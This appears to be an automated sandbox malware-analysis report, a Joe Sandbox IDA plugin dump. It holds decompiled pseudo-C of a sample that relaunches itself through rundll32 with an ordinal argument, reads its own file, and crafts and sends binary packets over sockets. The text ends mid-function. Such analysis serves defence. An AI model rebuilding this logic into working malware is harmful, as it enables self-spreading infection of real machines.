                                                                                                                                                              • API String ID: 1283781744-0
                                                                                                                                                              • Opcode ID: 5bb3740745caa44ee5f194502598f984c2626bf4a95570ecd8c928333658e416
                                                                                                                                                              • Instruction ID: 9f10ced59f1a2823efe5c3bcb63c97e1933fb29c9aed34c32d096099e6231cf0
                                                                                                                                                              • Opcode Fuzzy Hash: 5bb3740745caa44ee5f194502598f984c2626bf4a95570ecd8c928333658e416
                                                                                                                                                              • Instruction Fuzzy Hash: 8F319A71900225FBEB20ABA1DE88F9E7B79FF00745F105260E645A2054CB7AEE41DB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E27BF7(intOrPtr _a12) {
                                                                                                                                                              				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                              				struct _STARTUPINFOW _v88;
                                                                                                                                                              				short _v1648;
                                                                                                                                                              				short _v3208;
                                                                                                                                                              				int _t14;
                                                                                                                                                              				char* _t20;
                                                                                                                                                              				char* _t21;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				long _t28;
                                                                                                                                                              				long _t29;
                                                                                                                                                              
                                                                                                                                                              				_t14 = GetSystemDirectoryW( &_v1648, 0x30c);
                                                                                                                                                              				if(_t14 != 0) {
                                                                                                                                                              					_t14 = lstrcatW( &_v1648, L"\\rundll32.exe");
                                                                                                                                                              					if(_t14 != 0) {
                                                                                                                                                              						_t14 = GetModuleFileNameW( *0x4e37b98, 0x4e37bc8, 0x30c);
                                                                                                                                                              						if(_t14 != 0) {
                                                                                                                                                              							wsprintfW( &_v3208, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1648, PathFindFileNameW(0x4e37bc8), _a12);
                                                                                                                                                              							_t27 = 0x10;
                                                                                                                                                              							_t20 =  &_v20;
                                                                                                                                                              							do {
                                                                                                                                                              								 *_t20 = 0;
                                                                                                                                                              								_t20 = _t20 + 1;
                                                                                                                                                              								_t27 = _t27 - 1;
                                                                                                                                                              							} while (_t27 != 0);
                                                                                                                                                              							_t29 = 0x44;
                                                                                                                                                              							_t28 = _t29;
                                                                                                                                                              							_t21 =  &_v88;
                                                                                                                                                              							do {
                                                                                                                                                              								 *_t21 = 0;
                                                                                                                                                              								_t21 = _t21 + 1;
                                                                                                                                                              								_t28 = _t28 - 1;
                                                                                                                                                              							} while (_t28 != 0);
                                                                                                                                                              							_v88.cb = _t29;
                                                                                                                                                              							_t14 = CreateProcessW( &_v1648,  &_v3208, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                                                                                              							ExitProcess(0);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t14;
                                                                                                                                                              			}













                                                                                                                                                              0x04e27c0e
                                                                                                                                                              0x04e27c16
                                                                                                                                                              0x04e27c28
                                                                                                                                                              0x04e27c30
                                                                                                                                                              0x04e27c43
                                                                                                                                                              0x04e27c4b
                                                                                                                                                              0x04e27c6b
                                                                                                                                                              0x04e27c76
                                                                                                                                                              0x04e27c77
                                                                                                                                                              0x04e27c7c
                                                                                                                                                              0x04e27c7c
                                                                                                                                                              0x04e27c7e
                                                                                                                                                              0x04e27c7f
                                                                                                                                                              0x04e27c7f
                                                                                                                                                              0x04e27c84
                                                                                                                                                              0x04e27c85
                                                                                                                                                              0x04e27c87
                                                                                                                                                              0x04e27c8a
                                                                                                                                                              0x04e27c8a
                                                                                                                                                              0x04e27c8c
                                                                                                                                                              0x04e27c8d
                                                                                                                                                              0x04e27c8d
                                                                                                                                                              0x04e27cb0
                                                                                                                                                              0x04e27cb3
                                                                                                                                                              0x04e27cba
                                                                                                                                                              0x04e27cba
                                                                                                                                                              0x04e27c4b
                                                                                                                                                              0x04e27c30
                                                                                                                                                              0x04e27cc2

                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04E27C0E
                                                                                                                                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04E27C28
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(04E37BC8,0000030C), ref: 04E27C43
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(04E37BC8,?), ref: 04E27C51
                                                                                                                                                              • wsprintfW.USER32 ref: 04E27C6B
                                                                                                                                                              • CreateProcessW.KERNEL32 ref: 04E27CB3
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 04E27CBA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                                                                                                                                              • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                                                                              • API String ID: 3592876439-3730106045
                                                                                                                                                              • Opcode ID: 40222ecf4e1e2ef9393a7162f0bb3e9875b904f3dbf9fc4623815737ec703056
                                                                                                                                                              • Instruction ID: 92c96a549e46359eed0c873933bbc0ef56499f4e9eee160001e2b5e95a14798e
                                                                                                                                                              • Opcode Fuzzy Hash: 40222ecf4e1e2ef9393a7162f0bb3e9875b904f3dbf9fc4623815737ec703056
                                                                                                                                                              • Instruction Fuzzy Hash: 7C119AB250011D6FEB219BA5CF49EEB77BCEF08306F0455A6F605E2140DA35EE44CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E28832() {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				long _t25;
                                                                                                                                                              
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_t10 = CreateFileW(0x4e37bc8, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                              				_v12 = _t10;
                                                                                                                                                              				if(_t10 != 0xffffffff) {
                                                                                                                                                              					_t25 = GetFileSize(_t10, 0);
                                                                                                                                                              					if(_t25 != 0) {
                                                                                                                                                              						_t21 = HeapAlloc(GetProcessHeap(), 0, _t25);
                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							if(ReadFile(_v12, _t21, _t25,  &_v8, 0) != 0 || _v8 != _t25) {
                                                                                                                                                              								 *0x4e33984 = _t21;
                                                                                                                                                              								 *0x4e37b94 = _t25;
                                                                                                                                                              								_v16 = 1;
                                                                                                                                                              							} else {
                                                                                                                                                              								HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					CloseHandle(_v12);
                                                                                                                                                              				}
                                                                                                                                                              				return _v16;
                                                                                                                                                              			}









                                                                                                                                                              0x04e2884c
                                                                                                                                                              0x04e2884f
                                                                                                                                                              0x04e28855
                                                                                                                                                              0x04e2885b
                                                                                                                                                              0x04e28866
                                                                                                                                                              0x04e2886a
                                                                                                                                                              0x04e2887c
                                                                                                                                                              0x04e28880
                                                                                                                                                              0x04e2888c
                                                                                                                                                              0x04e28897
                                                                                                                                                              0x04e288af
                                                                                                                                                              0x04e288b5
                                                                                                                                                              0x04e288bb
                                                                                                                                                              0x04e2889e
                                                                                                                                                              0x04e288a7
                                                                                                                                                              0x04e288a7
                                                                                                                                                              0x04e28897
                                                                                                                                                              0x04e288c2
                                                                                                                                                              0x04e288c6
                                                                                                                                                              0x04e288cc
                                                                                                                                                              0x04e288d2

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(04E37BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04E2884F
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 04E28860
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04E2886F
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E28876
                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 04E2888F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04E288A0
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E288A7
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E288C6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 3250796435-3175316637
                                                                                                                                                              • Opcode ID: fa17ddceef6f03cbe84262e50805cef448b7aff16ac5901135bc0a18a448e80f
                                                                                                                                                              • Instruction ID: dab2a95259e00f8c8115d7f58510676f317b9d4df6331f5a30c17e6b5b077a06
                                                                                                                                                              • Opcode Fuzzy Hash: fa17ddceef6f03cbe84262e50805cef448b7aff16ac5901135bc0a18a448e80f
                                                                                                                                                              • Instruction Fuzzy Hash: F311BF72900214BFDB356BA6AE8CDAFBFBCEB85756F104259F501A2148D3799D01DB20
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E04E233A4(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed int _a24) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				long _t21;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				void* _t46;
                                                                                                                                                              
                                                                                                                                                              				_t21 = (_a24 & 0x0000ffff) + 0x37;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_v12 = _t21;
                                                                                                                                                              				_t35 = HeapAlloc(GetProcessHeap(), 8, _t21);
                                                                                                                                                              				if(_t35 != 0) {
                                                                                                                                                              					_t38 = 9;
                                                                                                                                                              					_t27 = memcpy(_t35, _a8, _t38 << 2);
                                                                                                                                                              					__imp__#9(_v12 + 0xfffffffc, _t40, _t46);
                                                                                                                                                              					 *(_t35 + 2) = _t27;
                                                                                                                                                              					 *((short*)(_t35 + 0x22)) = _a12;
                                                                                                                                                              					 *((char*)(_t35 + 8)) = 0x26;
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					asm("movsw");
                                                                                                                                                              					_t15 = _t35 + 0x37; // 0x37
                                                                                                                                                              					asm("movsb");
                                                                                                                                                              					_t31 = memcpy(_t15, _a20, _a24 & 0x0000ffff);
                                                                                                                                                              					__imp__#19(_a4, _t35, _v12, 0);
                                                                                                                                                              					if(_t31 > 0) {
                                                                                                                                                              						_v5 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}












                                                                                                                                                              0x04e233ae
                                                                                                                                                              0x04e233b4
                                                                                                                                                              0x04e233b8
                                                                                                                                                              0x04e233c8
                                                                                                                                                              0x04e233cc
                                                                                                                                                              0x04e233d8
                                                                                                                                                              0x04e233df
                                                                                                                                                              0x04e233e1
                                                                                                                                                              0x04e233ea
                                                                                                                                                              0x04e233f2
                                                                                                                                                              0x04e233fa
                                                                                                                                                              0x04e23401
                                                                                                                                                              0x04e23402
                                                                                                                                                              0x04e23403
                                                                                                                                                              0x04e23404
                                                                                                                                                              0x04e23409
                                                                                                                                                              0x04e2340b
                                                                                                                                                              0x04e2340f
                                                                                                                                                              0x04e23410
                                                                                                                                                              0x04e23421
                                                                                                                                                              0x04e2342b
                                                                                                                                                              0x04e2342d
                                                                                                                                                              0x04e2342d
                                                                                                                                                              0x04e2343b
                                                                                                                                                              0x04e2343b
                                                                                                                                                              0x04e23446

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04E23745,?,?,?,00000000,00000000,?,?,?,04E24A6E), ref: 04E233BB
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E23745,?,?,?,00000000,00000000,?,?,?,04E24A6E,?,?,?,?), ref: 04E233C2
                                                                                                                                                              • htons.WS2_32(?), ref: 04E233E1
                                                                                                                                                              • memcpy.MSVCRT ref: 04E23410
                                                                                                                                                              • send.WS2_32(?,00000000,?,00000000), ref: 04E23421
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E23434
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2343B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 4260819906-3175316637
                                                                                                                                                              • Opcode ID: e9511aa5de279c9b3d6192a45b2b2fca7c26ce0b59808515bbdfcd77b1c50ebc
                                                                                                                                                              • Instruction ID: 103befcc2e2cee1780114e2744028b44dd86f81b5b8c989475303075f3dabb2a
                                                                                                                                                              • Opcode Fuzzy Hash: e9511aa5de279c9b3d6192a45b2b2fca7c26ce0b59808515bbdfcd77b1c50ebc
                                                                                                                                                              • Instruction Fuzzy Hash: B0118E76400249ABEB119FA5DD89FAB7BA8EF09316F144055FE00AA241D7BAD905CB70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E04E23209(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				long _t22;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              				int _t31;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              				signed int _t40;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				void* _t52;
                                                                                                                                                              
                                                                                                                                                              				_t22 = (_a24 & 0x0000ffff) + 0x4b;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_v12 = _t22;
                                                                                                                                                              				_t37 = HeapAlloc(GetProcessHeap(), 8, _t22);
                                                                                                                                                              				if(_t37 != 0) {
                                                                                                                                                              					_t40 = 9;
                                                                                                                                                              					_t28 = memcpy(_t37, _a8, _t40 << 2);
                                                                                                                                                              					__imp__#9(_v12 + 0xfffffffc, _t44, _t52);
                                                                                                                                                              					 *(_t37 + 2) = _t28;
                                                                                                                                                              					 *((short*)(_t37 + 0x22)) = _a12;
                                                                                                                                                              					 *((char*)(_t37 + 8)) = 0xa1;
                                                                                                                                                              					_t13 = _t37 + 0x24; // 0x24
                                                                                                                                                              					_t31 = memcpy(_t13, _a16, 0 << 2);
                                                                                                                                                              					asm("movsw");
                                                                                                                                                              					_t16 = _t37 + 0x4b; // 0x4b
                                                                                                                                                              					asm("movsb");
                                                                                                                                                              					_t33 = memcpy(_t16, _a20, _t31);
                                                                                                                                                              					__imp__#19(_a4, _t37, _v12, 0, 9);
                                                                                                                                                              					if(_t33 > 0) {
                                                                                                                                                              						_v5 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t37);
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}













                                                                                                                                                              0x04e23213
                                                                                                                                                              0x04e23219
                                                                                                                                                              0x04e2321d
                                                                                                                                                              0x04e2322d
                                                                                                                                                              0x04e23231
                                                                                                                                                              0x04e2323d
                                                                                                                                                              0x04e23244
                                                                                                                                                              0x04e23246
                                                                                                                                                              0x04e2324f
                                                                                                                                                              0x04e23259
                                                                                                                                                              0x04e23262
                                                                                                                                                              0x04e23266
                                                                                                                                                              0x04e23269
                                                                                                                                                              0x04e2326f
                                                                                                                                                              0x04e23271
                                                                                                                                                              0x04e23275
                                                                                                                                                              0x04e23276
                                                                                                                                                              0x04e23287
                                                                                                                                                              0x04e23291
                                                                                                                                                              0x04e23293
                                                                                                                                                              0x04e23293
                                                                                                                                                              0x04e232a1
                                                                                                                                                              0x04e232a1
                                                                                                                                                              0x04e232ac

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04E23BAA,?,?,?,00000000,00000000,?,?,?,04E24A6E), ref: 04E23220
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E23BAA,?,?,?,00000000,00000000,?,?,?,04E24A6E,?,?,?,?), ref: 04E23227
                                                                                                                                                              • htons.WS2_32(?), ref: 04E23246
                                                                                                                                                              • memcpy.MSVCRT ref: 04E23276
                                                                                                                                                              • send.WS2_32(?,00000000,?,00000000), ref: 04E23287
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E2329A
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E232A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 4260819906-3175316637
                                                                                                                                                              • Opcode ID: a15c87afa48fcc590c3fe75ebaca479d8d9c5e746d76c1bf36ffa4ecf70e7b1e
                                                                                                                                                              • Instruction ID: bfd618a9ea7af197cdaada2a1e4c285521b4da25e1e07759ef303aa8341a9644
                                                                                                                                                              • Opcode Fuzzy Hash: a15c87afa48fcc590c3fe75ebaca479d8d9c5e746d76c1bf36ffa4ecf70e7b1e
                                                                                                                                                              • Instruction Fuzzy Hash: A4117F76500249AFEB109FA5DD45FAB7FA8EB49315F144045FE009A281D77AD905C760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E24F43(short __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				signed int _t27;
                                                                                                                                                              				int _t28;
                                                                                                                                                              				void* _t36;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				signed char _t40;
                                                                                                                                                              				signed int _t41;
                                                                                                                                                              				short _t50;
                                                                                                                                                              
                                                                                                                                                              				_t50 = __eax;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t39 = HeapAlloc(GetProcessHeap(), 8, 0x68);
                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                              					L11:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t40 = 0;
                                                                                                                                                              				do {
                                                                                                                                                              					_t27 = _t40 & 0x000000ff;
                                                                                                                                                              					_t2 = _t27 + 0x4e33730; // 0xfcfffffa
                                                                                                                                                              					_t40 = _t40 + 1;
                                                                                                                                                              					 *(_t39 + _t27) =  !( *_t2);
                                                                                                                                                              				} while (_t40 < 0x68);
                                                                                                                                                              				_t28 = rand();
                                                                                                                                                              				 *(_t39 + 0x18) = _t28;
                                                                                                                                                              				 *((short*)(_t39 + 0x34)) = _t28 + _t50;
                                                                                                                                                              				if(E04E22F5A(_a4, _a8, _t50, 0, 0xff, 8, _t39, 0x68) != 0) {
                                                                                                                                                              					_v12 = 0;
                                                                                                                                                              					_v16 = 0;
                                                                                                                                                              					if(E04E23071(_t40, _a4, _a8, _t50,  &_v16,  &_v12) != 0) {
                                                                                                                                                              						_t36 = _v16;
                                                                                                                                                              						if(_v12 == 0x70 &&  *((intOrPtr*)(_t36 + 0x50)) == 0x18 &&  *((intOrPtr*)(_t36 + 0x6c)) == 0) {
                                                                                                                                                              							_t41 = 5;
                                                                                                                                                              							_t36 = memcpy( *_a12, _t36 + 0x58, _t41 << 2);
                                                                                                                                                              							_v5 = 1;
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t36);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                                                                              				goto L11;
                                                                                                                                                              			}













                                                                                                                                                              0x04e24f50
                                                                                                                                                              0x04e24f52
                                                                                                                                                              0x04e24f63
                                                                                                                                                              0x04e24f69
                                                                                                                                                              0x04e25014
                                                                                                                                                              0x04e2501b
                                                                                                                                                              0x04e2501b
                                                                                                                                                              0x04e24f6f
                                                                                                                                                              0x04e24f71
                                                                                                                                                              0x04e24f71
                                                                                                                                                              0x04e24f74
                                                                                                                                                              0x04e24f7a
                                                                                                                                                              0x04e24f7e
                                                                                                                                                              0x04e24f81
                                                                                                                                                              0x04e24f86
                                                                                                                                                              0x04e24f9b
                                                                                                                                                              0x04e24fa4
                                                                                                                                                              0x04e24faf
                                                                                                                                                              0x04e24fbd
                                                                                                                                                              0x04e24fc3
                                                                                                                                                              0x04e24fcd
                                                                                                                                                              0x04e24fd3
                                                                                                                                                              0x04e24fd6
                                                                                                                                                              0x04e24fed
                                                                                                                                                              0x04e24fee
                                                                                                                                                              0x04e24ff0
                                                                                                                                                              0x04e24ff0
                                                                                                                                                              0x04e24ffe
                                                                                                                                                              0x04e24ffe
                                                                                                                                                              0x04e24fcd
                                                                                                                                                              0x04e2500e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000068,74654F20,?,77D74620,?,04E251F9,?,?,?), ref: 04E24F56
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E251F9,?,?,?), ref: 04E24F5D
                                                                                                                                                              • rand.MSVCRT ref: 04E24F86
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,04E251F9,?,00000000,?,04E251F9,04E251F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04E24FF7
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E24FFE
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,04E251F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04E251F9,?,?,?), ref: 04E25007
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,04E251F9,?,?,?), ref: 04E2500E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Free$Allocrand
                                                                                                                                                              • String ID: Oet Uet0Xet$p
                                                                                                                                                              • API String ID: 2875874559-2104030822
                                                                                                                                                              • Opcode ID: dda203960ce5bd0ffa04850137b65702a691a84a53b08a83747c17f25bc68a8a
                                                                                                                                                              • Instruction ID: 80496b15ab5f761f9f680946a1340970e895ea0b8b9fb729d6da91e7cbd45053
                                                                                                                                                              • Opcode Fuzzy Hash: dda203960ce5bd0ffa04850137b65702a691a84a53b08a83747c17f25bc68a8a
                                                                                                                                                              • Instruction Fuzzy Hash: DE21D336500254BBEB219FA58E88FAF7F69FF85316F009045FA409B181C6759859CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E269AE(void* _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				intOrPtr* _t31;
                                                                                                                                                              				void* _t36;
                                                                                                                                                              				intOrPtr* _t38;
                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				intOrPtr* _t51;
                                                                                                                                                              				long _t57;
                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                              				void* _t68;
                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                              				void* _t70;
                                                                                                                                                              
                                                                                                                                                              				_t31 = _a4;
                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                              				_t61 =  *0x4e37b80;
                                                                                                                                                              				_t63 = _t31 + 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t67 =  *_t31;
                                                                                                                                                              					_t31 = _t31 + 2;
                                                                                                                                                              				} while (_t67 != 0);
                                                                                                                                                              				_t36 = HeapAlloc(GetProcessHeap(), 8, (_t31 - _t63 >> 1) + (_t31 - _t63 >> 1) + 2);
                                                                                                                                                              				_v16 = _t36;
                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                              					_t38 = _a4;
                                                                                                                                                              					_t68 = _t38 + 2;
                                                                                                                                                              					do {
                                                                                                                                                              						_t64 =  *_t38;
                                                                                                                                                              						_t38 = _t38 + 2;
                                                                                                                                                              					} while (_t64 != 0);
                                                                                                                                                              					memcpy(_v16, _a4, (_t38 - _t68 >> 1) + (_t38 - _t68 >> 1) + 2);
                                                                                                                                                              					_t43 = _a8;
                                                                                                                                                              					_t65 = _t43 + 2;
                                                                                                                                                              					do {
                                                                                                                                                              						_t69 =  *_t43;
                                                                                                                                                              						_t43 = _t43 + 2;
                                                                                                                                                              					} while (_t69 != 0);
                                                                                                                                                              					_t48 = HeapAlloc(GetProcessHeap(), 8, (_t43 - _t65 >> 1) + (_t43 - _t65 >> 1) + 2);
                                                                                                                                                              					_v12 = _t48;
                                                                                                                                                              					if(_t48 == 0) {
                                                                                                                                                              						L12:
                                                                                                                                                              						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t51 = _a8;
                                                                                                                                                              						_t70 = _t51 + 2;
                                                                                                                                                              						do {
                                                                                                                                                              							_t66 =  *_t51;
